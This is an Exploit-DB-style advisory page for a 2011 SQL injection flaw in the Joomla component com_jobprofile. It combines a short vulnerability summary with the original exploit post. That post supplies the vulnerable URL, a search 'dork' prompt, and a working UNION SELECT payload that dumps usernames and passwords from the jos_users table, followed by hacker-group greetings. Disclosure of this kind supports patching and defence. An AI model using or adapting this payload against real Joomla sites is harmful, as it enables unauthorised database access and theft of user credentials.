Joomla Component Jobprofile (com_jobprofile) SQL Injection Vulnerability

vendor:

Jobprofile

by:

kaMtiEz

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Jobprofile

Affected Version From: null

Affected Version To: 1

Patch Exists: Yes

Related CWE: N/A

CPE: a:thakkertech:jobprofile

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2011

Joomla Component Jobprofile (com_jobprofile) SQL Injection Vulnerability

A SQL Injection vulnerability was discovered in Joomla Component Jobprofile (com_jobprofile). An attacker can exploit this vulnerability to gain access to sensitive information from the database. The vulnerable parameter is ‘id’ which is not properly sanitized before being used in an SQL query. An attacker can inject arbitrary SQL code into the ‘id’ parameter to gain access to sensitive information from the database.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to upgrade to the latest version of the software.

Source

Exploit-DB raw data:

[~] Joomla Component Jobprofile (com_jobprofile) SQL Injection Vulnerability
[~] Author : kaMtiEz (kamtiez@exploit-id.com)
[~] Homepage : http://www.indonesiancoder.com / http://exploit-id.com / http://magelangcyber.web.id
[~] Date : 2 Dec , 2011

[ Software Information ]

[+] Vendor : http://www.thakkertech.com/
[+] INFO : http://extensions.joomla.org/extensions/ads-a-affiliates/jobs-a-recruitment/11924
[+] Download : http://www.thakkertech.com/products/joomla-extensions/components/jobprofile-joomla-component-detail.html
[+] Version : null / 1.0 maybe :D
[+] Price : 25,00 
[+] Vulnerability : SQL INJECTION
[+] Dork : "think it :D"
[+] LOCATION :  INDONESIA -

[ Vulnerable File ]

 http://127.0.0.1/[kaMtiEz]/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=[SQL]

[ XpL ]

 http://127.0.0.1/[kaMtiEz]/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=-1+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9+from+jos_users--

[ FIX ]

 dunno :">
 
[ Thx TO ]

[+] INDONESIANCODER  EXPLOIT-ID  MAGELANGCYBER TEAM  MALANGCYBER CREW  KILL-9
[+] Tukulesto,arianom,el-farhatz,Jundab,ibl13Z,Ulow,s1do3L,Boebefa,Hmei7,RyanAby,AlbertWired,GonzHack,n4kuLa,t3ll0
[+] f4ckMen,By_aGreSiF,t0r3x,Mboys,Contrex,Gh4mb4S,jos_ali_joe,k4l0ng666,n4sss,r3m1ck,k4mpret0,Dr.Cruzz
[+] yur4kh4,xr0b0t,kido,trycyber,n4ck0,Caddy-Dz,pinpinbo,zaenal,gepenk ~ etc etc

[ NOTE ]

[+] let it be ..
[+] be yourself ;)

[ QUOTE ]

[+] INDONESIANCODER still r0x
[+] nothing secure ..